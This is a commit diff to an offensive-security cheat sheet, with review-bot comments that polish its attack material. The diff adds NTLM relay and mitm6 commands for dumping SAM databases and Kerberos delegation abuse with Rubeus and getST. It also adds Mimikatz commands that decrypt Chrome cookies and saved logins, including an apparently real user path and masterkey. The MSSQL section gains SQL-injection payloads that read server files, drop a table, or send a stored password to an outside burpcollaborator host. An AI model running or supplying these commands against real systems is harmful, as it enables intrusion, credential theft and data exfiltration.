Relay + MSSQL Read File
parent f6b9d63bf8
commit 0443babe35
|
@ -50,7 +50,7 @@
|
|||
- [Using impacket](#using-impacket)
|
||||
- [Using Rubeus](#using-rubeus)
|
||||
- [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
- [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
||||
- [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
|
||||
|
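Review bot: renaming the TOC entry to `#man-in-the-middle-attacks--relaying` drops the `#ntlmv2-hashes-relaying` anchor, so any existing deep link to the old section will now land at the top of the page. If inbound links matter, keep an explicit `<a name="ntlmv2-hashes-relaying"></a>` above the renamed heading, or mention the old name in the section text.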
@ -1436,7 +1436,7 @@ Then crack the hash with `hashcat`
|
|||
hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
```
|
||||
|
||||
### NTLMv2 hashes relaying
|
||||
### Man-in-the-Middle attacks & relaying
|
||||
|
||||
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||
|
||||
|
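Review bot: under the new heading `### Man-in-the-Middle attacks & relaying` the only introductory sentence is still `NTLMv1 and NTLMv2 can be relayed to connect to another machine.`, which covers relaying but not the man-in-the-middle part the title now promises. Add a sentence saying how the authentication reaches the relay (the subsections use Responder and mitm6 for this) so the title and body match.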
@ -1473,14 +1473,13 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
|||
HTTP = Off # Turn this off
|
||||
```
|
||||
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list.
|
||||
```powershell
|
||||
ntlmrelayx.py -tf targets.txt
|
||||
```
|
||||
3. Run `python Responder.py -I <interface_card>`
|
||||
4. Use a relay tool such as `ntlmrelayx` or `MultiRelay`
|
||||
- `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list.
|
||||
- `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
|
||||
```powershell
|
||||
$ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
|
||||
$ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support
|
||||
[*] Servers started, waiting for connections
|
||||
Type help for list of commands
|
||||
ntlmrelayx> socks
|
||||
|
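Review bot: step 4 and the step 5 example now use only `impacket-ntlmrelayx`, which is the name of the distribution-packaged wrapper; a pip or source install of Impacket provides `ntlmrelayx.py`, so readers on that setup will get "command not found". State once that the two names are the same tool. In the same hunk, step 5 should read "SOCKS proxy" and "every compromised session", the `MultiRelay.py` bullet has no description while the ntlmrelayx bullet does, and the fence is tagged `powershell` although it holds a `$`-prompt shell session.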
@ -1489,12 +1488,18 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
|||
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
|
||||
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
|
||||
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
|
||||
|
||||
$ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
|
||||
|
||||
# You might need to select a target with "-t"
|
||||
impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
|
||||
impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
|
||||
|
||||
# the socks proxy can then be used with your Impacket tools or CrackMapExec
|
||||
$ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth
|
||||
$ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
**Mitigations**:
|
||||
|
||||
* Disable LLMNR via group policy
|
||||
```powershell
|
||||
|
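Review bot: `proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1` keeps the Samba `smbclient` argument form (`//host/share -U user`) after swapping in Impacket's client, which takes its target as `domain/user@host` like the `impacket-mssqlclient` line below it, so the command as written will be rejected. Either keep Samba's `smbclient` here or rewrite the target in Impacket form. The added lines also mix `192.168.48.230` (the host in the `socks` listing) with `10.10.10.10`, and mix `$`-prefixed with unprefixed commands; pick one host and one prompt style so the block reads as a single session.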
@ -1510,15 +1515,21 @@ Mitigations:
|
|||
Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
|
||||
|
||||
```powershell
|
||||
cme smb $hosts --gen-relay-list relay.txt
|
||||
crackmapexec smb $hosts --gen-relay-list relay.txt
|
||||
|
||||
# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
|
||||
# -d is the domain name that we filter our request on - the attacked domain
|
||||
# -i is the interface we have mitm6 listen on for events
|
||||
mitm6 -i eth0 -d $domain
|
||||
|
||||
# spoofing WPAD and relaying NTLM credentials
|
||||
ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
|
||||
or
|
||||
ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
|
||||
impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt
|
||||
impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug
|
||||
|
||||
# -ip is the interface you want the relay to run on
|
||||
# -wh is for WPAD host, specifying your wpad file to serve
|
||||
# -t is the target where you want to relay to.
|
||||
impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
|
||||
```
|
||||
|
||||
#### Drop the MIC
|
||||
|
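Review bot: removing the `or` between the `-of loot -tf relay.txt` and `-l /tmp -socks -debug` invocations makes them read as two steps to run in sequence, whereas the original text presented them as alternatives. Put a comment line such as `# or, with a SOCKS proxy` between them. The comment `# -ip is the interface you want the relay to run on` should say it is the IP address of the local interface, since the example passes `10.10.10.1`, and the new `ldaps://` example drops the `-6` used by the two commands above without saying whether that is intended.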
@ -1984,8 +1995,10 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
|
|||
|
||||
# Find the service
|
||||
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
# Exploit with Impacket
|
||||
#### Exploit with Impacket
|
||||
```ps1
|
||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
||||
|
||||
|
@ -1994,14 +2007,28 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
|
|||
[*] Requesting S4U2self
|
||||
[*] Requesting S4U2Proxy
|
||||
[*] Saving ticket in Administrator.ccache
|
||||
```
|
||||
|
||||
# Exploit with Rubeus
|
||||
#### Exploit with Rubeus
|
||||
```ps1
|
||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||
$ dir \\dc.domain.com\c$
|
||||
```
|
||||
|
||||
#### Impersonate a domain user on a resource
|
||||
|
||||
Require:
|
||||
* SYSTEM level privileges on a machine configured with constrained delegation
|
||||
|
||||
```ps1
|
||||
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
|
||||
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
|
||||
PS> $idToImpersonate.Impersonate()
|
||||
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
|
||||
PS> ls \\dc01.offense.local\c$
|
||||
```
|
||||
|
||||
### Kerberos Resource Based Constrained Delegation
|
||||
|
||||
|
|
|
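Review bot: the new `#### Impersonate a domain user on a resource` section gives a bare `Require:` line and a five-line PowerShell transcript with no sentence saying what it does or what output to expect from `GetCurrent() | select name`. Change `Require:` to `Requirements:` and add a one-line description. In the snippet, `[Reflection.Assembly]::LoadWithPartialName` is obsolete in .NET; `Add-Type -AssemblyName System.IdentityModel` is the current form. The relaying section of this file carries a **Mitigations** list, and this section would benefit from one as well.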
@ -11,6 +11,9 @@
|
|||
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
|
||||
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
|
||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||
* [Vault](#vault)
|
||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
||||
* [References](#references)
|
||||
|
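Review bot: `Chrome Cookies & Credential`, `Task Scheduled credentials` and `Vault` are added as top-level TOC bullets, but the headings visible in this commit (`### Chrome Cookies & Credential`, `### Task Scheduled credentials`) are subsections of `## Mimikatz - Credential Manager & DPAPI`. Indent the entries under that bullet so the TOC mirrors the heading hierarchy.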
@ -178,8 +181,6 @@ net start sesshijack
|
|||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## Mimikatz - Credential Manager & DPAPI
|
||||
|
||||
```powershell
|
||||
|
@ -196,6 +197,17 @@ $ mimikatz !sekurlsa::dpapi
|
|||
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
||||
```
|
||||
|
||||
### Chrome Cookies & Credential
|
||||
|
||||
```powershell
|
||||
# Saved Cookies
|
||||
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
|
||||
dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b
|
||||
|
||||
# Saved Credential in Chrome
|
||||
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
|
||||
```
|
||||
|
||||
### Task Scheduled credentials
|
||||
|
||||
```powershell
|
||||
|
|
|
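Review bot: the second `dpapi::chrome` example hard-codes a user profile (`C:\Users\kbell\...`) and a full `/masterkey:` value. The `dpapi::cred` line just above uses `<username>`; do the same here and replace the key with a `<masterkey>` placeholder so that no value that may have come from a real engagement is published. The new lines also omit the `$ mimikatz` prefix used by the surrounding examples, and the heading reads `Credential` where `Task Scheduled credentials` uses the plural.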
@ -14,6 +14,7 @@
|
|||
* [MSSQL Blind Based](#mssql-blind-based)
|
||||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||
* [MSSQL Read file](#mssql-read-file)
|
||||
* [MSSQL Command execution](#mssql-command-execution)
|
||||
* [MSSQL Out of band](#mssql-out-of-band)
|
||||
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
|
||||
|
@ -147,6 +148,16 @@ Use a semi-colon ";" to add another query
|
|||
ProductID=1; DROP members--
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Read file
|
||||
|
||||
**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
|
||||
|
||||
```sql
|
||||
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Command execution
|
||||
|
||||
```sql
|
||||
|
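Review bot: the payload `-1 union select null,(select x from OpenRowset(BULK ...) R(x)),null,null` assumes a four-column result set whose second column is string-typed, and the section does not say so; add a line noting that the `null` placeholders must match the injected query. The **Permissions** line is useful, and it would be worth adding that an application login should not hold `ADMINISTER BULK OPERATIONS` or `ADMINISTER DATABASE BULK OPERATIONS`, since withholding them is what prevents this read.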
@ -196,7 +207,12 @@ GO
|
|||
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
|
||||
|
||||
```powershell
|
||||
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
|
||||
# Permissions: Requires VIEW SERVER STATE permission on the server.
|
||||
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
|
||||
|
||||
# Permissions: Requires the CONTROL SERVER permission.
|
||||
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
|
||||
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
|
||||
```
|
||||
|
||||
|
||||
|
|
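Review bot: the `# Permissions:` comments now cover `fn_xe_file_target_read_file` and `fn_get_audit_file`, but the `fn_trace_gettable` line at the end has none, and it is not obvious whether each comment applies to the query above or below it. Put one comment directly above each query, including the last. The line starting `1 (select 1 where exists(` has no `and` between the literal and the subquery, unlike the other two, so check it against the referenced source. The fence is tagged `powershell` although the content is SQL, and `#` is not SQL comment syntax.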